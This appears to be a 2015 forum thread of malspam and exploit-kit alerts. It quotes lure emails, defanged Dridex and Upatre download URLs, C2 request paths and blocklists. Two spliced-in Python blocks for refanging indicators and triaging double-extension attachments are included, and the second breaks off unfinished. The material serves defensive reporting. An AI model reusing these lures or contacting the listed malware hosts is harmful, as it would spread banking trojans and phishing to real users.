Jun 16, 2015 - "Adobe may have already patched a Flash Player vulnerability last week, but several users — especially those in the US, Canada, and the UK — are still currently exposed and are at risk of getting infected with CryptoWall 3.0. The Magnitude Exploit Kit included an exploit, detected as SWF_EXPLOIT.MJTE, for the said vulnerability, allowing attackers to spread crypto-ransomware into their target systems. We first saw signs of this activity yesterday, June 15... Adobe’s regular June Update for Adobe Flash Player... upgraded the software to version 18.0.0.160*. However, many users are still running the previous version (17.0.0.188), which means that a lot of users are still at risk... cybercriminals rapidly take advantage of recently-patched vulnerabilities through exploit kits. We saw a similar incident in March, where exploits for an Adobe Flash Player vulnerability were added to the Nuclear Exploit Kit just a week after the patch was released. We also noted earlier this month that Flash Player was being targeted more frequently by exploit kits, and that shows no sign of changing soon..."
* https://www.adobe.com/products/flashplayer/distribution3.html
___
Fake 'Travel order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/the-caravan-club-travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2015 - "'Travel order confirmation 0300202959' pretending to come from overseastravel@ caravanclub .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear customer,
Thank you for your travel order.
Please find attached your booking confirmation which you should take with you on your trip. Please note we no longer send tickets for overseas travel bookings.
Your booking confirmation document is stored as a DOC file which requires the use of Microsoft Word software to view it.
Yours sincerely
The Caravan Club
This email is sent from the offices of The Caravan Club, a company limited by guarantee (Company Number: 00646027). The registered office is East Grinstead House, London Road, East Grinstead, West Sussex, RH19 1UA.
Regulation The Caravan Club Ltd is authorised and regulated by the Financial Conduct Authority. FCA registration number is 311890
This email is sent from the offices of The Caravan Club Limited...
16 June 2015: Travel Order Confirmation – 0300202959.doc
Current Virus total detections: 4/57* ... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**). Note: there are normally 5 or 6 other download locations but all will lead to same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/a6db40b6751b42e6bb53aaf6b92657b5c1042ef66f3cc5b5dabae488356038e3/analysis/1434440780/
** https://www.virustotal.com/en-gb/file/539750d11af0b92f8365e4aa20248fdd46fc6726e7141bef30688fafcf92b938/analysis/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-address/203.124.96.148/information/
___
Fake 'Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/carol-young-baguette-express-invoice-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2016 - "'Invoice' pretending to come from Carol Young <carol@ baguette-express. co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Invoice Attached
Carol Young
Accounts Manager
Office:0845 070 4360
Email: carol@ baguette-express .co.uk
Web: www .baguette-express .co.uk
1 Cranston Crescent
Lauder
Borders
TD2 6UB
16 June 2015: A4 Inv_Crd Unit Price, With Discount.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from dubrovnik-marryme .com/90/72.exe (VirusTotal**) This is the -same- malware payload as described in today’s other malspam word macro malware 'The caravan Club Travel order confirmation 0300202959'*** – word doc or excel xls spreadsheet malware..."
* https://www.virustotal.com/en-gb/file/2fb05492886bfab3a1163a0992d0ca7bbff2d07c927c4add4839966eaa53516a/analysis/1434441322/
** https://www.virustotal.com/en-gb/file/539750d11af0b92f8365e4aa20248fdd46fc6726e7141bef30688fafcf92b938/analysis/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
*** http://myonlinesecurity.co.uk/the-caravan-club-travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
dubrovnik-marryme .com: 188.40.57.166: https://www.virustotal.com/en-gb/ip-address/188.40.57.166/information/
___
Fake 'Invoice copy' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/gary-almond-almondscateringsupplies-co-uk-invoice-copy-no-252576-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2015 - "'Invoice copy no. 252576' pretending to come from kathy@ almondscateringsupplies .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached DOC document with invoice copy no. 252576
Kind regards,
Gary Almond
16 June 2015 : DespatchNote_-_252576_160615_063107663.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**)
Note: there are normally 5 or 6 other download locations but all will lead to same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/a6db40b6751b42e6bb53aaf6b92657b5c1042ef66f3cc5b5dabae488356038e3/analysis/1434440780/
** https://www.virustotal.com/en-gb/file/539750d11af0b92f8365e4aa20248fdd46fc6726e7141bef30688fafcf92b938/analysis/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-address/203.124.96.148/information/
___
Fake 'Internet Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/eclipse-internet-invoice-is-available-online-36889843ec-word-doc-or-excel-xls-spreadsheet-malware/
16 Jun 2015 - "'Eclipse Internet Invoice is available online – 36889843EC' pretending to come from customer@ eclipse .net.uk with a malicious word doc called EC_36889843_88113463.doc is another one from the current bot runs... The email looks like:
Dear Customer,
Thank you for choosing to receive your invoice by email. Please find this attached.
If you would like to change any of your billing options, please log in to My Eclipse using your registration email and password... Alternatively, you can contact our Customer Service Team, Monday to Friday 8am – 6pm, on the telephone number published...
Kind regards
Eclipse Internet
The number in the subject which is random -matches- the word attachment name, so everybody gets a different named email and attachment. The malicious macro and the downloaded Dridex banking malware are exactly the -same- as described in today’s earlier other word macro malspam runs:
1]'Gary Almond almondscateringsupplies .co.uk Invoice copy no. 252576 – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/gary-almond-almondscateringsupplies-co-uk-invoice-copy-no-252576-word-doc-or-excel-xls-spreadsheet-malware/
2]'Carol Young baguette-express Invoice – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/carol-young-baguette-express-invoice-word-doc-or-excel-xls-spreadsheet-malware/
3]'The caravan Club Travel order confirmation 0300202959 – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/the-caravan-club-travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
___
Trojan uses steganography to hide itself in image files
- http://net-security.org/malware_news.php?id=3058
16.06.2015 - "The Dell SecureWorks* CTU research team has recently analyzed a piece of malware that uses digital steganography to hide part of its malicious code. Stegoloader, as they dubbed it, is not technically new. Previous versions of the malware have been spotted in 2013 and 2014, bundled with tools used to crack or generate software keys... Stegoloader's main reason for being is to steal information from users, but it has a modular design, and the researchers themselves say that they might not have yet seen and analyzed all of its modules... Stegoloader is not the first malware to use steganography to hide malicious code or information such as the address of the malware's backup C&C, but the researchers note that it could represent an emerging trend in malware... researcher Saumil Shah recently demonstrated at the Hack in the Box conference**, it's possible to insert both malicious code and exploit code that will trigger it into an image, and this type of delivery mechanism is still undetectable by current defensive solutions."
* http://www.secureworks.com/cyber-threat-intelligence/threats/stegoloader-a-stealthy-information-stealer/
** http://www.net-security.org/secworld.php?id=18443
___
Dutch Users: victims of Large Malvertising Campaign
- https://blog.malwarebytes.org/malvertising-2/2015/06/dutch-users-victim-of-large-malvertising-campaign/
June 15, 2015 - "Security firm Fox-IT* has identified a large malvertising campaign that began affecting Dutch users on June 11:
* http://blog.fox-it.com/2015/06/15/large-malvertising-campaign-targeting-the-netherlands/
In their blog post, they say that several major news sites were loading the -bogus- advertisement that ultimately led to the Angler exploit kit. Looking at our telemetry we also noticed this attack, and in particular on Dutch news site Telegraaf[.]nl via an advert from otsmarketing .com, which according to Fox-IT is -more- than a suspicious ad network:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/diagram.png
The ad silently loaded a Google shortened URL used to -redirect- to the exploit kit... This latest malvertising case illustrates the efficacy of leveraging ad networks to selectively infect end users while also demonstrating that there is a clear problem with identifying rogue advertisers. As stated by Fox-IT, the company responsible for the malvertising was not 'loaded via advertisements until Thursday last week, the first day we’ve seen this malvertising campaign in action'. This leaves some serious questions about the additional scrutiny in place for new advertisers and how it made it through security checks."
107.181.187.81: https://www.virustotal.com/en-gb/ip-address/107.181.187.81/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-17, 15:55
FYI...
Fake 'PayPal Receipt' SPAM - PDF malware
- http://myonlinesecurity.co.uk/paypal-receipt-for-your-payment-to-omer-salim-fake-pdf-malware/
17 June 2015 - "'Receipt for Your Payment to OMER SALIM' pretending to come from service@ intl .paypal .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Receipt-for-Your-Payment-to-OMER-SALIM.png
17 June 2015: Receipt99704.zip: Extracts to: Receipt99704.PDF.exe
Current Virus total detections: 10/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/9d40ab9364ed5cdd379faa5a6c178e39c3499d19393707eac8fdfc5cd356aaac/analysis/1434488522/
___
Fake 'Refunds for overpaid taxes' – Phish ...
- http://myonlinesecurity.co.uk/hmrc-refunds-for-overpaid-property-taxes-phishing/
17 June 2015 - "'Refunds for overpaid property taxes' pretending to come from HM Revenue & Customs <ecustomer.support@ hmrc .gateway .gov.uk> is an email pretending to come from HM Revenue & Customs... This one wants your personal details and your bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... This particular email has a zip attachment that when unzipped has html webpage that asks you to fill in bank details. If you open the html attachment you see a webpage looking like this where they want your bank details, name and birth date:
Phish Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/HMRC-Refunds-for-overpaid-property-taxes.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend, or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___
Fake 'Document Service' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/document-service-order-id-14262781-le-bistrot-pierre-limited-icc-word-doc-or-excel-xls-spreadsheet-malware/
17 June 2015 - "'Document Service, Order Id: 14262781 pretending to come from ICC <orders@ icc .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Document-Service-Order-Id.png
17 June 2015: 14262781_FMM_751061928.doc - Current Virus total detections: 4/57*
The malicious macro in this particular word doc downloads Dridex banking malware from http ://cheshiregunroom .com/23/07.exe. There are normally between 5 and 10 other download sites, all giving the same Dridex banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/1cafc8cc89dd9ac7d12ed4a76a069e5b7c168611030fa3cda7e56459da18f462/analysis/1434529913/
** https://www.virustotal.com/en-gb/file/9b2b5f26a3ef218129504e7b8e198e96395fbd4e33422cb0f2d70eb4f04136d0/analysis/1434531876/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-address/37.143.11.165/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
cheshiregunroom .com: 92.63.140.197: https://www.virustotal.com/en-gb/ip-address/92.63.140.197/information/
___
Fake 'Message from KMBT' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/message-from-kmbt_c280-word-doc-or-excel-xls-spreadsheet-malware/
17 Jun 2015 - "Message from KMBT_C280' pretending to come from scanner@ your own email domain with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email comes in with a completely -empty- body and just the subject line of Message from KMBT_C280.
17 June 2015 : SKMBT_C28015061614410.doc - Current Virus total detections: 4/57*
This particular malicious macro downloads Dridex banking malware from http ://businesssupportsoutheastlondon .co.uk/23/07.exe which is the -same- as described in today’s other malspam word doc campaign Document Service, Order Id: 14262781** - LE BISTROT PIERRE LIMITED – ICC – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/b3e490b271715dab743f4b9f1ea38380508d6db223820ef78149a26176fc5852/analysis/1434531806/
** http://myonlinesecurity.co.uk/document-service-order-id-14262781-le-bistrot-pierre-limited-icc-word-doc-or-excel-xls-spreadsheet-malware/
businesssupportsoutheastlondon .co.uk: 88.208.248.144: https://www.virustotal.com/en-gb/ip-address/88.208.248.144/information/
___
Botnet-based malicious SPAM seen this week
- https://isc.sans.edu/diary.html?storyid=19807
2015-06-17 - "Botnets continually send out malicious spam (malspam). As mentioned in previous diaries, we see botnet-based malspam delivering Dridex and Dyre malware almost every day [1, 2]. Recently, someone sent us a malicious Word document from what appeared to be Dridex malspam on Tuesday 2015-06-16... Unfortunately, while investigating the malware, I could not generate the full range of infection traffic. Otherwise, the traffic follows the same general patterns we've previously seen with Dridex [1]... Dridex has been using Microsoft Word documents and Excel spreadsheets designed to infect a computer if macros are enabled, which matches the infection vector used by this malspam... Macros are -not- enabled in the default installation for Microsoft Office. To infect a computer, most people will have to -enable- macros after the document is opened, as shown below:
> https://isc.sans.edu/diaryimages/images/2015-06-16-ISC-diary-image-04.jpg
...
> https://isc.sans.edu/diaryimages/images/2015-06-16-ISC-diary-image-05.jpg ..."
1] https://isc.sans.edu/diary/Recent+Dridex+activity/19687
2] https://isc.sans.edu/diary/UpatreDyre+the+daily+grind+of+botnetbased+malspam/19657
:fear::fear: :mad:
AplusWebMaster
2015-06-18, 15:31
FYI...
Fake email “Bank query alert” contains trojan
- http://blog.mxlab.eu/2015/06/18/fake-email-bank-query-alert-contains-trojan/
June 18, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Bank query alert”. This email is sent from spoofed email addresses and has the following body:
Good day!
Please note that we have received the bank query from Your bank regarding the current account.
You are asked to fill the appropriate bank form, which is enclosed below, until 20th day of
June in order to avoid the security hold of the account. Please also confirm the following
account No.: 9042 5736 6695 0412. After filling the document please send us the scan-copy
so that we could duly forward it to the bank manager. If you have any questions feel
free to contact us on: 677-77-90.
Thanks in advance.
Best regards, Michael Forester Managing Partner
The attached file Michael.zip contains the 46 kB large file Transfer_blocked.exe. The trojan is known as Trojan.Win32.Generic.pak!cobra, Gen:Variant.Graftor.198120, Trojan.Win32.YY.Gen.4, LooksLike.Win32.Upatre.g (v) or Downloader.Upatre!gen9. At the time of writing, 7 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/afa59fea8ed3a059c9de753acc3b98bd70d0ad990f0540f42bede07f945f11da/analysis/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en/ip-address/64.182.208.183/information/
93.93.194.202: https://www.virustotal.com/en/ip-address/93.93.194.202/information/
173.248.29.43: https://www.virustotal.com/en/ip-address/173.248.29.43/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
___
Fake 'CVD Insurance' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/cvd-insurance-documents-attached-lowri-duffield-brightsidegroup-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
18 Jun 2015 - "'CVD Insurance – documents attached' pretending to come from Lowri Duffield <lowri.duffield@ brightsidegroup .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/CVD-Insurance-documents-attached.png
18 June 2015: 3098_001.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from http ://evolutionfoundationcollege .co.uk/66/71.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/50385aa1722cfd0b98b385a9b1767f594b798bfe56aa00b435f5fdb3645c7736/analysis/1434619773/
** https://www.virustotal.com/en/file/12102cc5107cbb4a2481fba496ecb8d6a646c4a071278e498d0dadbb29182675/analysis/1434619280/
evolutionfoundationcollege .co.uk: 188.121.55.128: https://www.virustotal.com/en/ip-address/188.121.55.128/information/
___
Fake 'Transfer to your account blocked' SPAM – PDF malware
- http://myonlinesecurity.co.uk/transfer-to-your-account-blocked-fake-pdf-malware/
18 Jun 2015 - "'Transfer to your account blocked' coming from random names at random email addresses with a zip attachment is another one from the current bot runs... The email which has random ID numbers that -match- the attachment name looks like:
Transfer has been blocked, details in an attachment.
ID Transfer: 96907740967
Date of formation: Thu, 18 Jun 2015 13:35:45 +0100
18 June 2015: id96907740967_Transfer_details.zip: Extracts to: Transfer_blocked.exe
Current Virus total detections: 3/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fd35711209a8785f035862f8283b2638268b7c3b27ce2c2672a509b87d6f848f/analysis/1434629016/
___
Fake 'banking invoice' SPAM - leads to malware
- http://blog.dynamoo.com/2015/06/malware-spam-nota-fiscal-eletronica-cod.html
18 Jun 2015 - "These Portuguese-language spam pretends to be some sort of banking invoice aim, but instead leads to malware hosted on Google Drive. The target appears to be users in Brazil.
From: sac.contact4e74974737@ bol .com.br
To: mariomarinho@ uol .com.br
Date: 18 June 2015 at 08:46
Subject: NOTA FISCAL ELETRÔNICA COD. 6Uhrae.088693
Signed by: bol .com.br ...
The reference numbers and sender change slightly in each version. I've seen three samples before, each one with a different download location... which leads to a ZIP file named NFe_0185189710250029301785.zip which in turn contains a malicious executable NFe_0185189710250029301785.exe which has a VirusTotal detection rate of 8/57*. Comments in that report indicate that this may be the Spy.Banker trojan. The Malwr report indicates that it downloads components from the following locations:
http ://donwup2015 .com.br/arq/point.php
http ://tynly2015 .com.br/upt/ext.zlib
... These sites are hosted on:
108.167.188.249 (WebsiteWelcome, US)
187.17.111.104 (Universo Online, Brazil)
The VirusTotal report for both these IPs [1] [2] indicates a high level of badness, indicating that they should be -blocked-. Furthermore, Malwr shows that it drops a file with a detection rate of 2/57**...
Recommended blocklist:
108.167.188.249
187.17.111.104 ..."
* https://www.virustotal.com/en/file/207bb94c49a397bddfc230996d6135250255e5e55606498f46590e0b3241b046/analysis/1434618710/
... Behavioural information
TCP connections
1] 108.167.188.249: https://www.virustotal.com/en/ip-address/108.167.188.249/information/
2] 187.17.111.104: https://www.virustotal.com/en/ip-address/187.17.111.104/information/
** https://www.virustotal.com/en/file/e35c9dc53ec0b1f468614584d472656174753635d847238ad2547589f7d5a32c/analysis/1434619879/
:fear: :mad:
AplusWebMaster
2015-06-19, 18:35
FYI...
Fake 'New instructions' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-new-instructions.html
19 June 2015 - "This rather terse spam comes with a malicious payload:
From: tim [tim@ thramb .com]
Date: 19 June 2015 at 16:40
Subject: New instructions
New instructions payment of US banks, ask to read
Attached is an archive file with the somewhat unusual name of instructions.zip size=19811 which contains a malicious executable named instructions_document.exe. The VirusTotal analysis indicates that this is the Upatre download [detection rate 3/57*]. Automated analysis tools... show traffic to: 93.93.194.202 :13222/C21/UEQUILABOOMBOOM/0/51-SP3/0/MEBEFEBLGBEID ... which is an IP operated by Orion Telekom in Serbia, and also 66.196.63.33 :443 which is Hamilton Telecommunications in the US. A characteristic of this generation of Upatre is that it sends traffic to icanhazip.com which while not malicious in itself is quite a good indicator of infection. In all cases I have seen, Upatre drops the Dyre banking trojan, but I have been unable to obtain a sample.
Recommended blocklist:
93.93.194.202
66.196.63.33 "
* https://www.virustotal.com/en/file/640fe9501d7078b6644604e3ef4d838372f1654c45f75a241fef4e194d5bde85/analysis/1434725207/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
93.93.194.202: https://www.virustotal.com/en/ip-address/93.93.194.202/information/
66.196.63.33: https://www.virustotal.com/en/ip-address/66.196.63.33/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
:fear::fear: :mad:
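The write-ups quoted in this thread defang their indicators by inserting spaces ("aspectaceindia .in", "http ://", "93.93.194.202 :13222") or brackets ("Telegraaf[.]nl") so nothing is clickable, and they end with a "Recommended blocklist". The following is an added example, not code from the thread or from the blogs it quotes, showing how a defender would re-join those indicators and turn a write-up into a de-duplicated blocklist. The function names, the regular expressions and the allow-list for a compromised-but-legitimate site are this example's own choices; the sample text is constructed in the style of the posts above and reuses only indicators already quoted there.

```python
"""Extract and normalise defanged indicators from a malspam write-up.

Added example, not code from the forum thread or the blogs it quotes.
Function names, regexes and the allow-list idea are this example's own.
"""
from __future__ import annotations

import ipaddress
import re

# Constructed sample in the style of the posts above; every indicator in it is
# one the posts themselves quote.
SAMPLE_REPORT = """Automated analysis tools show traffic to 93.93.194.202 :13222
(Orion Telekom, Serbia) and also 66.196.63.33 :443 (Hamilton Telecommunications, US).
The macro downloads from http ://dubrovnik-marryme .com/90/72.exe and aspectaceindia .in
Malvertising on Telegraaf[.]nl via an advert from otsmarketing .com
Recommended blocklist:
93.93.194.202
66.196.63.33
"""

URL_RE = re.compile(r"https?://([^\s/]+)")
IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# A hostname must not be glued to a preceding "/" or word character, so path
# components such as "72.exe" are not mistaken for hosts.
HOST_RE = re.compile(r"(?<![\w/.-])(?:[a-z0-9-]+\.)+[a-z]{2,}(?![\w/-])")


def refang(text: str) -> str:
    """Undo the common defanging conventions so indicators are contiguous."""
    text = text.replace("[.]", ".").replace("(.)", ".").replace("{.}", ".")
    text = re.sub(r"hxxp", "http", text, flags=re.IGNORECASE)
    text = re.sub(r"\s+://", "://", text)                      # "http ://"   -> "http://"
    text = re.sub(r"\s+\.(?=[a-z])", ".", text, flags=re.I)   # "host .tld"  -> "host.tld"
    text = re.sub(r"\s+:(?=\d)", ":", text)                    # "1.2.3.4 :443" -> "1.2.3.4:443"
    return text


def extract_indicators(text: str) -> dict[str, set[str]]:
    """Return validated IPv4 addresses and hostnames found in (defanged) text."""
    clean = refang(text).lower()
    ips: set[str] = set()
    hosts: set[str] = set()
    # Pull hosts out of URLs first, then blank the URLs so their paths are not scanned.
    for m in URL_RE.finditer(clean):
        host = m.group(1).split(":")[0]
        try:
            ips.add(str(ipaddress.IPv4Address(host)))
        except ipaddress.AddressValueError:
            hosts.add(host)
    clean = URL_RE.sub(" ", clean)
    for m in IP_RE.finditer(clean):
        try:
            ips.add(str(ipaddress.IPv4Address(m.group(0))))  # rejects octets above 255
        except ipaddress.AddressValueError:
            pass
    hosts.update(m.group(0) for m in HOST_RE.finditer(clean))
    return {"ips": ips, "hosts": hosts}


def blocklist(text: str, allow: frozenset[str] = frozenset()) -> list[str]:
    """Sorted, de-duplicated block entries; allow-listed hosts (e.g. a legitimate
    news site that merely carried the malicious advert) are left out."""
    found = extract_indicators(text)
    ips = sorted(found["ips"], key=lambda s: tuple(int(o) for o in s.split(".")))
    hosts = sorted(h for h in found["hosts"] if h not in allow)
    return ips + hosts


if __name__ == "__main__":
    for entry in blocklist(SAMPLE_REPORT, allow=frozenset({"telegraaf.nl"})):
        print(entry)
```

The allow-list matters in the malvertising case above: the Dutch news site served the rogue advert but is not itself the thing to block, so it is excluded while the ad network and the payload hosts are kept.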
AplusWebMaster
2015-06-22, 14:37
FYI...
Fake 'Shareholder alert' SPAM – PDF malware
- http://myonlinesecurity.co.uk/shareholder-alert-glen-mccoy-fake-pdf-malware/
22 Jun 2015 - "'Shareholder alert' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hope this e-mail finds You well. Please note that in 2015 no dividends will be paid due to
resolution of the Board of Directors. Please see attached. Glen McCoy, Partner
22 June 2015: instructions.zip size=21120.zip : Extracts to: instructions_document.exe
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/a9b71614deb53d9ec3a00cd38cbefd7822cb1b9e4dcf5067286cca2b388d596e/analysis/1434971131/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
93.93.194.202: https://www.virustotal.com/en-gb/ip-address/93.93.194.202/information/
109.86.226.85: https://www.virustotal.com/en-gb/ip-address/109.86.226.85/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
- http://blog.dynamoo.com/2015/06/malware-spam-shareholder-alert.html
22 June 2015
"... Recommended blocklist:
64.111.36.35
93.93.194.202 "
___
Fake 'Tax inspection notification' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-tax-inspection.html
22 June 2015 - "This -fake- tax notification comes with a malicious payload.
Date: 22 June 2015 at 19:10
Subject: Tax inspection notification
Good day!
Trust this e-mail finds You well.
Please be notified that next week the revenue service is going to organize tax inspections.
That is why we highly recommend You to file the attached form in order to be prepared.
Inspectors are to determine whether You as a taxpayer have settled the correct amount of taxes.
According to our records, the inspectors license No. is 090-96919-5886-935. Please check as it is an important procedure rule.
We may discuss all the related matters by phone: +1 998-497-85. Feel free to contact us.
Bruce Climt,
Tax Advisor
Attached is a file with a malformed ZIP filename of tax_663-20845-0479-435.zip size=18288.zipsize=18288 which contains a malicious executable info_bank_pdf.exe which has a VirusTotal detection rate of 4/57*... Malwr analysis indicates a traffic pattern consistent with the Upatre downloader:
http ://93.93.194.202 :13234/203/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http ://93.93.194.202 :13234/203/HOME/41/5/4/ELHBEDIBEHGBEHK
That IP address is the same as seen in this attack earlier today[1] and it belongs to Orion Telekom in Serbia. This VirusTotal report*** also shows traffic to 178.214.221.89 (Optical Systems LLC, Ukraine), and this Hybrid Analysis report[2] also shows traffic to 37.57.144.177 (Triolan, Ukraine). Furthermore, this other Malwr report shows two dropped executables, karetfob.exe [VT 4/57***] and sveezback.exe [VT 15/57****]. The dropped payload will be the Dyre banking trojan.
Recommended blocklist:
93.93.194.202
178.214.221.89
37.57.144.177 "
* https://www.virustotal.com/en/file/94344782386c3c50a5080e9b520a0934a21cdcd952f82aff02e8692f67e92f40/analysis/
** https://www.virustotal.com/en/file/94344782386c3c50a5080e9b520a0934a21cdcd952f82aff02e8692f67e92f40/analysis/
*** https://www.virustotal.com/en/file/5f12ad0aa6c420098b8efb251282792bfff636f2e21f97931117c4b8b512c426/analysis/1434994679/
**** https://www.virustotal.com/en/file/17ec39315de471f1c52d833bf59481d2b4b866b151fe459ca6927b540f957f43/analysis/1434994696/
1] http://blog.dynamoo.com/2015/06/malware-spam-shareholder-alert.html
2] https://www.hybrid-analysis.com/sample/94344782386c3c50a5080e9b520a0934a21cdcd952f82aff02e8692f67e92f40?environmentId=1
___
'Password recovery' SCAM hitting Gmail, Outlook and Yahoo Mail users
- http://net-security.org/secworld.php?id=18537
22 June 2015 - "A simple yet ingenious scam is being used by scammers to compromise accounts of Gmail, Outlook and Yahoo Mail users, Symantec researcher Slawomir Grzonkowski warns*. 'To pull off the attack, the bad guys need to know the target’s email address and mobile number; however, these can be obtained without much effort... The attackers make use of the password recovery feature offered by many email providers, which helps users who have forgotten their passwords gain access to their accounts by, among other options, having a verification code sent to their -mobile- phone.' Once the verification code is sent to the legitimate user's mobile phone, it's followed by a message by the scammer, saying something like: 'Google has detected unusual activity on your account. Please respond with the code sent to your mobile device to stop unauthorized activity.' The victim sends the verification code to the scammers, and they use it to access the email account.
Occasionally, the code is sent too late and doesn't work anymore, so the scammers -reiterate- the need for the code to be sent in. When they finally get access to the email account, they don't shut the real owner out. Instead, they usually add an -alternate- email to the account and set it up so that copies of all messages are forwarded to it. Then they change the password, and send it to victim via SMS ('Thank you for verifying your Google account. Your temporary password is [TEMPORARY PASSWORD]') in order to complete the illusion of legitimacy. 'The cybercriminals carrying out these attacks do not seem to be focused on financial gain such as stealing credit card numbers. They appear to be looking to gather information about their targets and are not targeting users en masse, instead going for specific individuals. The way they operate is similar to the methods used by APT groups'... It's likely that they use those email accounts to gain access to other online accounts tied to them. Users are advised to be suspicious of SMS messages asking about verification codes, especially if they did -not- request one, and check their authenticity directly with their email provider."
* https://www.youtube.com/watch?v=_dj_90TnVbo&feature=youtu.be
Video 2:17
:fear::fear: :mad:
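Two lure patterns recur in the posts above: the spoofed-icon double extension ("Receipt99704.PDF.exe" looks like a PDF when "show known file extensions" is off) and the malformed archive names ("instructions.zip size=19811", "tax_663-20845-0479-435.zip size=18288.zipsize=18288") whose embedded size= token matches the real byte count and which some ZIP handlers and mail filters mishandle. The following is an added example, not code from the thread or the blogs it quotes, of a mail-gateway triage check for both patterns. The function names, extension sets, verdict labels and the constructed sample archive are this example's own; the archive contains placeholder bytes, not a program.

```python
"""Triage of malspam attachment names and ZIP contents.

Added example, not code from the forum thread or the blogs it quotes.
Function names, extension sets and the sample archive are this example's own.
"""
from __future__ import annotations

import io
import re
import zipfile

# Extensions Windows will execute directly; a "document" ending in one of
# these is the icon-spoofing trick the posts describe.
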